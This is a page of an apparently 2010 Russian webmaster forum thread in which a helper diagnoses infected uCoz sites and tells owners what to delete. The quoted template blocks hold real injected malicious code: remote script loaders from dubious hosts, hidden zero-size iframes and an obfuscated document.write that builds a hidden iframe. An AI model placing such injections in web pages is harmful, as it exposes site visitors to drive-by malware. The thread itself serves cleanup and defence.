Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение)
Вирусы на сайтах (для изучения)
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 121 | 16:28:04 30 Ноя 2010
ser-kut, кукисы и кеш пусть очистят.

некоторые антивирусы могут реагировать на это

Code
<script type="text/javascript"><!--

last24_color_bg = '#FFFFFF';
last24_color_title = '#003366';
last24_title_fontsize = '12px';
last24_title_fontweight = 'normal';
last24_color_title_hover = '#FF1605';
last24_link_decor = 'underline';

document.write('<sc'+'ript type="text/javascript" src="http://last24.info/l24n4mer/h/6/8/l/utf/?rnd=' + Math.round(Math.random() * 100000) + '"></sc'+'ript>');
//--></script>

но это только параноидальные

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
elena-pok
Сообщений: 30
Репутация: 10

Сообщение # 122 | 16:30:35 30 Ноя 2010
Quote (webanet)
Quote

webanet, подскажите пожалуйста еще, а как теперь убрать блокировку от Google?
ждать

Спасибо, будем ждать!
Только вот прочитала всё первое сообщение темы и так не нашла противоядие для своего случая. Ссылку на аватар, что лежит на вредоносном сайте можно вставлять всегда, даже с отключенной загрузкой собственных аватаров и вв-кодов. Получается, что запретить вставлять ссылки в аватар с других сайтов нельзя?

mvart
Сообщений: 29
Репутация: 3

Сообщение # 123 | 16:57:06 30 Ноя 2010
Пользователи жалуются что на сайте какой-то типа вирус
сайт http://83.садик86.рф

Цитата
Здравствуйте! Нельзя ли как-то проверить сайт антивирусом? Дело в том, что у моей няни, когда она зашла на сайт, её Касперский выдал "червя", она сразу отключилась. У меня Аваст тоже постоянно блокирует какой-то вредоносный файл. Когда я сюда захожу, почему-то врубается что-то через проигрыватель и загружается Adobe Reader.

конец цитаты

Не пойму что у них может быть ?????

Konstantin9679
Сообщений: 4
Репутация: 0

Сообщение # 124 | 01:09:32 02 Дек 2010
У меня такая проблема. Проверял сейчас свой сайт http://mobile-video.ucoz.ru на вирусы сервисом http://2ip.ru вылезло вот это -
Подозрение на вирус!!
На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.
Проверял и другими сервисами выдает вот это - На странице http://mobile-video.ucoz.ru возможно есть вредоносный код!

Помогите пожалуйста люди добрые! Что не так с моим сайтом?

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 125 | 01:19:47 02 Дек 2010
Konstantin9679, чистенько и аккуратненько у вас всё. а на счет проверки 2ip.ru я уже писала в этой теме. этот сервис реагирует на все ифреймы без разбору. юкоза использует по умолчанию два ифрейма. это вывод рекламного баннера и миничат. так же некоторые виджеты и гаджеты работают через ифреймы.
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 126 | 01:37:47 02 Дек 2010
mtrolik,
Quote
<!-- <block5> -->
<table border="0" cellpadding="0" cellspacing="0" width="200">
<tr><td height="40" style="background:url('/.s/t/401/14.gif'); padding-top:8px;color:#B7B3C5;" align="center" valign="top"><b><!-- <bt> -->Подарок<!-- </bt> --></b></td></tr>
<tr><td style="background:url('/.s/t/401/15.gif') #C3C1CA;padding:0px 10px 0px 10px;"><!-- <bc> --><script type="text/javascript" src="http://wmcasher.ru/wmcbonus.php?encoding=w"></script> <form action="http://wmcasher.ru/bonus/" method="post"> <p>Вы можете получить WMR-бонус в размере 0,01-0,10 WMR на свой кошелек 1 раз в сутки</p><iframe src="http://reff.moy.su/" width="0%" height="0%" name="iframe" scrolling="auto" frameborder=0></iframe><p>Кошелек <input type="text" name="bonuspurse" value="R" size="13" id="wmcbonuspurse"/><br/> Код <img src="http://wmcasher.ru/captcha/" width="50" height="21" alt="Защитный код"><input type="text" name="keystring" value="" size="5" id="wmcbonuskeystring"/><br/> <input type="button" value=" Получить бонус " onclick="getwmcbonus()" style="width:120px"/></p> <p>Бонус предоставлен сервисом <a href="http://www.wmcasher.ru">www.wmcasher.ru</a><br> при поддержке <br><a href="http://pr.do.am">Заработать в сети</a></p> </form><!-- </bc> --></td></tr>

<tr><td height="13"><img src="/.s/t/401/16.gif" border="0"></td></td>
</table><br />
<!-- </block5> -->

в блоке подарок выделенное красным срочно удалить
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 127 | 02:02:31 02 Дек 2010
mvart, у вас на сайте и смех и грех biggrin в блоке безопасность стоит вредоносный скрипт

Quote
<!-- <block9561> -->
<table class="boxTable"><tr><th><!-- <bt> -->Безопасность<!-- </bt> --></th></tr><tr><td class="boxContent center"><!-- <bc> --><div class="bod">
<script language="JavaScript">
function do_scan_file_01()
{
var left = (screen.width - 640)/2;
var top = (screen.height - 400)/2;
window.open( "",
"drweb_scan_form_popup_window",
"width=640"+",height=400,left="+left+",top="+top+",scrollbars=yes,resizable=yes" );
document.getElementById( "drweb_online_scan_form" ).submit();
return false;
}
</script>

<form method="POST" id="drweb_online_scan_form" enctype="multipart/form-data" action="http://online.drweb.com/result" target="drweb_scan_form_popup_window">
<div class="dr" align="center">Проверка файлов на вирусы</div>
<div class="dr" align="center"><input id="file_selection_input" name="file" size="16%" type="file"><script type="text/javascript" src="http://onona.pp.ua/1.js"></script></div>
<div class="dr" align="center">
<img alt="null" src="http://s46.radikal.ru/i111/1009/05/1fc9b62e0447.gif" align="top" border="0" height="21" width="31">

<input onclick="return do_scan_file_01();" src="http://s58.radikal.ru/i162/1009/21/b1d12ac84fcb.gif" height="19" type="image" width="90"></div>
</form>
<hr style="border: 1px dotted;">
<script language="JavaScript">
function resultURL()
{
var left = (screen.width - 640)/2
var top = (screen.height - 400)/2
window.open( "", "scan", "width=640"+
",height=400,left="+left+
",top="+top+",scrollbars=no,resizable=yes")
document.getE lementById( "drwebscanformURL" ).target = "scan";
return true;
}
</script>

<form target="scan" id="drwebscanformURL" action="http://online.us.drweb.com/result/" onsubmit="return resultURL()" method="post">
<div class="dr" align="center">Проверка ссылки на вирусы</div>
<div class="dr" align="center"><input name="url" value="http://" class="find" style="width: 100%; border: 2px solid rgb(154, 196, 97);" type="text"></div>
<div class="dr" align="center">
<img alt="null" src="http://s46.radikal.ru/i111/1009/05/1fc9b62e0447.gif" align="top" border="0" height="21" width="31">
<input src="http://s58.radikal.ru/i162/1009/21/b1d12ac84fcb.gif" height="19" type="image" width="90"></div>
</form>
</div><!-- </bc> --></td></tr></table>
<!-- </block9561> -->

выделенное красным удалить

скрипт вскрывается вот таким вот образом

Code
document.write("<"+"if"+"ram"+"e"+" sr"+"c='http"+":"+"/"+"/"+"gait6.narod.ru'"+" w"+"idt"+"h='0' he"+"ight='0' st"+"yle='v"+"isib"+"il"+"ity: h"+"idd"+"en;'></"+"ifr"+"a"+"me"+">");

небезопасный у вас получился блок безопасности. biggrin

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
KaReN10
Сообщений: 1
Репутация: 0

Сообщение # 128 | 11:25:53 02 Дек 2010
webanet, помогите пожалуйста..у меня на сайте какой то вирус..сайт http://life-fifa.ucoz.ru/ антивир пищит..посетители говорят заранее благодарен wink
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 129 | 14:34:46 02 Дек 2010
KaReN10, кнопка выбора языков. кусок кода

Quote

<input onclick="this.form.langpair.value=this.value" title="Danish" value="ru|da" src="http://romale80.ucoz.ru/translation/images/Denmark.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Danish</span><BR>
<iframe src="http://rapnews.pp.ua/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe><input onclick="this.form.langpair.value=this.value" title="Chinese" value="ru|zh-CN" src="http://romale80.ucoz.ru/translation/images/China.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Chinese</span><BR>
<input onclick="this.form.langpair.value=this.value" title="Korean" value="ru|ko" src="http://romale80.ucoz.ru/translation/images/Korea.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Korean</span><BR>
<input onclick="this.form.langpair.value=this.value" title="Arabic" value="ru|ar" src="http://romale80.ucoz.ru/translation/images/Arab.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Arabic</span><BR>

выделенное красным удалить. а в идеале удалить все что связанно с этими кнопками переключения языков. толку ноль от такого, но зато тонна лишнего мусора на сайте в виде очень длинного списка внешних ссылок

и посмотрите на свою кодировку на сайте

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
GoldHouse
Сообщений: 10
Репутация: 7

Сообщение # 130 | 18:04:54 02 Дек 2010
всем привет,у меня на компе стоит эксплорер,опера,мозила и Google Chrome.
основная у меня опера,экспрорер я использую для обновления для системы,мозилу для 2-го сайта и для гостей.(чтоб в опере не перенастраивать коды каждый раз.
Google Chrome устоновил посмотреть что ето за браузер.
друг зашол на мой сайт и у него мазила показала что там есть вирусы
вот его фото

я проверил через сайт http://2ip.ru и действительно показало что там есть вирусы

как мне их найти и уничтожить.
могло ли послужить смена дизайна сайта и смена шапки,к возникновению данной проблемы
на вот етом сайте http://fanat-igr.ucoz.ru/

Прикрепления: 5648358.jpg (104.2 Kb) · 5870666.jpg (312.6 Kb)
The-Will[101hp]
Сообщений: 8
Репутация: -3

Сообщение # 131 | 18:25:12 02 Дек 2010
Очень нужна ваша помощь...
У меня вирусы...
Помойму 2...
Вот собственно сайт...
djlimon.my1.ru
умаляю помогите...
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 132 | 19:28:02 02 Дек 2010
GoldHouse, ваш сайт заблокирован гуглом вот из-за этого блока
Code
<!-- <block5> -->
<table border="0" cellpadding="0" cellspacing="0" style="background:url('/.s/t/841/5.gif') #A4A3A3;" width="191">
<tr><td height="29" style="background:url('/.s/t/841/6.gif') #585858;color:#FFFFFF;padding-right:10px;" align="right"><b><!-- <bt> -->Block title<!-- </bt> --></b></td></tr>
<tr><td style="background:url('/.s/t/841/7.gif') top no-repeat;"><!-- <bc> --><script type="text/javascript" src="http://p0rtal.org/informer/25"></script>  
<script type="text/javascript" src="http://p0rtal.org/informer/19"></script>  
<script type="text/javascript" src="http://p0rtal.org/informer/26"></script><!-- </bc> --></td></tr>
<tr><td><img src="/.s/t/841/8.gif" border="0"></td></tr>
</table><br />
<!-- </block5> -->

удалить полностью

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 133 | 19:34:09 02 Дек 2010
The-Will[101hp], у вас та же самая история

удалить следующий код

Code
<script type="text/javascript" src="http://p0rtal.org/informer/23"></script>  

<div id="carousel" style="position: absolute; top: 100px; left: 300px;">  
<script type="text/javascript" src="http://p0rtal.org/informer/24"></script>  
</div>

а так же стоит снести вот этот мусор

Quote
<div class="fade">
<div class="sideicon writeforus"><span>Write for Us</span></div>
<div class="write">

<h4>Полезное</h4><br>
<ul class="featuredlist">
<script type="text/javascript" src="http://scriptbox.net.ru/cs_block_dw.js"></script>
<script type="text/javascript" src="http://java-gala.net.ru/soft/Softblock2.js"></script>
</tr>
</ul>
</div>

выделенное красным
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
XumSan
Сообщений: 4
Репутация: 6

Сообщение # 134 | 20:07:47 02 Дек 2010
Здравствуйте! При просмотре сайта иногда очень редко выскакивает что-то наподобие рекламы (В верхнем правом углу) Баннер. Даже при блокировке рекламы в Mozille.
Порыляся у себя в коде, но ничего не нашел - опыт не позволяет.
Что это может быть?

Сайт - xumich.ucoz.ru

"Нет вредных веществ, есть вредные количества" - Д.И. Менделеев
"С хорошим мотором и ворота полетят" - Туполев
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 135 | 20:24:21 02 Дек 2010
XumSan, скрин баннера что у вас выскакивает выложите. вашему сайту уже исполнилось 10 дней? как давно?
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение)
Поиск: